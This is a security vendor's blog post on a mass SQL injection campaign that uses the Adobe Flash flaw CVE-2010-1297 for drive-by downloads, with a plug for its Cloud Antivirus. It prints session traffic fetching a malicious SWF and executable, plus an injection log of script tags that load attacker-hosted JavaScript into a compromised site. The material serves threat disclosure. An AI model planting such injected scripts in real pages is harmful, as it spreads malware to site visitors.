The crew behind the recent massive SQLi is currently exploiting the latest CVE-2010-1297 vulnerability in its drive-by-download attacks. Yesterday, I created a video demonstrating how Cloud Antivirus blocked the 0day exploit using the new behavioral blocking technology included in the free version. Check that out here:
We recommend patching Adobe and then installing Cloud Antivirus to prevent any future 0day attacks.
Here are some logs of our most recent encounter:
Session traffic:
GET hxxp://2677.in/cnzz.html
200 OK (text/html)
GET hxxp://2677.in/ie.html
200 OK (text/html)
GET hxxp://s11.cnzz.com/stat.php?id=1990191&web_id=1990191
200 OK (text/html)
GET hxxp://2677.in/log.txt
200 OK (text/plain)
GET hxxp://2677.in/anhey.swf
200 OK (application/x-shockwave-flash)
GET hxxp://2677.in/anhey.swf
206 Partial Content (application/x-shockwave-flash)
GET
hxxp://zs13.cnzz.com/stat.htm?id=1990191&r=http%3A//www.generationdb.com/&lg
=en-us&ntime=0.14859300%201276289711&repeatip=0&rtime=0&cnzz_eid=82761217-12
76289711-http%3A//www.generationdb.com/&showp=800×600&st=1276292642&sin=http
%3A//www.generationdb.com/&res=0
200 OK (image/gif)
GET hxxp://2677.in/log.exe
200 OK (application/octet-stream)
Injection log:
< table width=”96%” border=”0″ align=”center” cellpadding=”0″
cellspacing=”0″ >
< tr >
< td colspan=”2″ > < img alt=”" src=”images/5×5.gif” width=”5″ height=”8″
/ > < /td >
< /tr >
< tr >
< td align=”center” class=”hoverbox” > < a href=”#” > < img
src=’upload/community/moresmall_37726110_lego.jpg< script src=hxxp://ww.robint.us/u.js > < /script > < script src=hxxp://2677.in/yahoo.js > < /script > ‘ alt=”" / > < img src=’upload/community/large_37726110_lego.jpg< script src=http://ww.robint.us/u.js > < /script > < script src=hxxp://2677.in/yahoo.js > < /script > ‘ alt=”" class=”preview” / > < /a > < /td >
< td width=”55%” valign=”top” class=”category” >
< a href=”unregisteredcommunity.aspx?Com_id=’7′”
target=”_self” > We are all < /a > … < br / > Category: Groups,<
br / > Location: USA< script src=hxxp://2677.in/yahoo.js > < /script > < /td > < /tr > < tr > < td colspan=”2″ > —————————————–< /td > < /tr > < /table > < /td >
< /tr > < tr >
< td >
< table width=”96%” border=”0″ align=”center” cellpadding=”0″
cellspacing=”0″ >
< tr >
< td colspan=”2″ > < img alt=”" src=”images/5×5.gif” width=”5″ height=”8″
/ > < /td >
< /tr >
< tr >
< td align=”center” class=”hoverbox” > < a href=”#” > < img
src=’upload/community/moresmall_2065474113_IMG_4127.JPG< script src=hxxp://ww.robint.us/u.js > < /script > < script src=hxxp://2677.in/yahoo.js > < /script > ‘ alt=”" / > < img src=’upload/community/large_2065474113_IMG_4127.JPG< script src=hxxp://ww.robint.us/u.js > < /script > < script src=hxxp://2677.in/yahoo.js > < /script > ‘ alt=”" class=”preview” / > < /a > < /td >
< td width=”55%” valign=”top” class=”category” >
< a href=”unregisteredcommunity.aspx?Com_id=’6′”
target=”_self” > Technosoft < /a > … < br / > Category:
Business,< br / > Location: India< script src=hxxp://2677.in/yahoo.js > < /script > < /td > < /tr > < tr > < td colspan=”2″ class=”line” > —————————————–< /td > < /tr > < /table > < /td >
< /tr >
< /table >
0 Responses to “Robint.us SQLi Utilizing CVE-2010-1297 Exploit”
Leave a Reply
You must login to post a comment.